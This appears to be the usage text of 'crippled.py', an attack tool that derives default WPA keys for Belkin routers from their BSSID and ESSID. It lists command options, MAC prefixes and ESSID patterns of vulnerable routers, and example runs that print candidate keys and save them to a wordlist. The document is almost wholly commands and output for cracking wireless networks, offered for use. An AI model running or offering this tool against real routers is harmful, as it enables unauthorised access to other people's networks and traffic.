What does it do ? ... Read the Topic header
Usage:
Basic Usage: ./crippled.py -b 94:44:52:00:C0:DE -e Belkin.c0de
-h | show this help message and exit
-w [WORDLIST] | Write outputed keys to file.
-a | Create all possible key cases.
-l | List all vulnerable mac address so far.
Required Options:
-----------------
-b [BSSID]
-e [ESSID]
# PRACTICAL EXAMPLES #
----------------------
./crippled.py -l
- Possible vulnerable targets so far:
essid: Belkin.XXXX
essid: Belkin_XXXXXX
essid: belkin.xxxx
essid: belkin.xxx
bssid: 94:44:52:uv:wx:yz
bssid: 08:86:3B:uv:wx:yz
bssid: EC:1A:59:uv:wx:yz
./crippled.py -b 94:44:52:00:C0:DE -e Belkin.c0de
040D93B0
./crippled.py -b 94:44:52:00:ce:d0 -e belkin.ed0
d49496b9
./crippled.py -b 94:44:52:00:ce:d0 -a
64949db9
D40493B0
649996b9
649496b9
d49496b9
34029DB0
d49996b9
D40293B0
64999db9
340493B0
34009DB0
340093B0
34049DB0
340293B0
D40093B0
./crippled.py -b 94:44:52:00:ce:d0 -a -w keys.txt
$ cat keys.txt
64949db9
D40493B0
649996b9
649496b9
d49496b9
34029DB0
d49996b9
D40293B0
64999db9
340493B0
34009DB0
340093B0
34049DB0
340293B0
D40093B0